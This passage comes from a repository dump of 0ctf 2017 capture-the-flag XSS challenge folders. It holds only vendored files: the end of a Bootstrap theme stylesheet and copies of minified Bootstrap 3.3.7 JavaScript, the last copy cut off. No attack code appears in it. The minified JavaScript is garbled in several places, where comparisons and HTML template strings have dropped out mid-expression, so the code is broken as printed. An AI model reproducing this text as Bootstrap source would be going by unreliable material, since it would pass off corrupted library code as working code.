0,#357ebd 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff357ebd', GradientType=0);background-repeat:repeat-x}.panel-success>.panel-heading{background-image:-webkit-linear-gradient(top,#dff0d8 0,#d0e9c6 100%);background-image:-o-linear-gradient(top,#dff0d8 0,#d0e9c6 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#dff0d8),to(#d0e9c6));background-image:linear-gradient(to bottom,#dff0d8 0,#d0e9c6 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffdff0d8', endColorstr='#ffd0e9c6', GradientType=0);background-repeat:repeat-x}.panel-info>.panel-heading{background-image:-webkit-linear-gradient(top,#d9edf7 0,#c4e3f3 100%);background-image:-o-linear-gradient(top,#d9edf7 0,#c4e3f3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9edf7),to(#c4e3f3));background-image:linear-gradient(to bottom,#d9edf7 0,#c4e3f3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9edf7', endColorstr='#ffc4e3f3', GradientType=0);background-repeat:repeat-x}.panel-warning>.panel-heading{background-image:-webkit-linear-gradient(top,#fcf8e3 0,#faf2cc 100%);background-image:-o-linear-gradient(top,#fcf8e3 0,#faf2cc 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fcf8e3),to(#faf2cc));background-image:linear-gradient(to bottom,#fcf8e3 0,#faf2cc 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffcf8e3', endColorstr='#fffaf2cc', GradientType=0);background-repeat:repeat-x}.panel-danger>.panel-heading{background-image:-webkit-linear-gradient(top,#f2dede 0,#ebcccc 100%);background-image:-o-linear-gradient(top,#f2dede 0,#ebcccc 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f2dede),to(#ebcccc));background-image:linear-gradient(to bottom,#f2dede 0,#ebcccc 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2dede', endColorstr='#ffebcccc', GradientType=0);background-repeat:repeat-x}.well{background-image:-webkit-linear-gradient(top,#e8e8e8 0,#f5f5f5 100%);background-image:-o-linear-gradient(top,#e8e8e8 0,#f5f5f5 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#e8e8e8),to(#f5f5f5));background-image:linear-gradient(to bottom,#e8e8e8 0,#f5f5f5 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe8e8e8', endColorstr='#fff5f5f5', GradientType=0);background-repeat:repeat-x;border-color:#dcdcdc;-webkit-box-shadow:inset 0 1px 3px rgba(0,0,0,.05),0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 3px rgba(0,0,0,.05),0 1px 0 rgba(255,255,255,.1)} -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/static/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.3.7 (http://getbootstrap.com) 3 | * Copyright 2011-2016 Twitter, Inc. 4 | * Licensed under the MIT license 5 | */ 6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){if(a(b.target).is(this))return b.handleObj.handler.apply(this,arguments)}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.7",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a("#"===f?[]:f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.7",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c).prop(c,!0)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c).prop(c,!1))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target).closest(".btn");b.call(d,"toggle"),a(c.target).is('input[type="radio"], input[type="checkbox"]')||(c.preventDefault(),d.is("input,button")?d.trigger("focus"):d.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.7",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(!(a>this.$items.length-1||a<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){if(!this.sliding)return this.slide("next")},c.prototype.prev=function(){if(!this.sliding)return this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.7",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",f)))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.7",g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,40==c.which&&jdocument.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth
',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);if(c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),!c.isInStateTrue())return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide()},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-mo.width?"left":"left"==h&&k.left-lg.top+g.height&&(e.top=g.top+g.height-i)}else{var j=b.left-f,k=b.left+f+c;jg.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null,a.$element=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;!e&&/destroy|hide/.test(b)||(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");c.VERSION="3.3.7",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:''}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.7",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b=e[a]&&(void 0===e[a+1]||b .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.7",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return e=a-d&&"bottom"},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery); -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/main/static/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.3.7 (http://getbootstrap.com) 3 | * Copyright 2011-2016 Twitter, Inc. 4 | * Licensed under the MIT license 5 | */ 6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){if(a(b.target).is(this))return b.handleObj.handler.apply(this,arguments)}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.7",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a("#"===f?[]:f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var 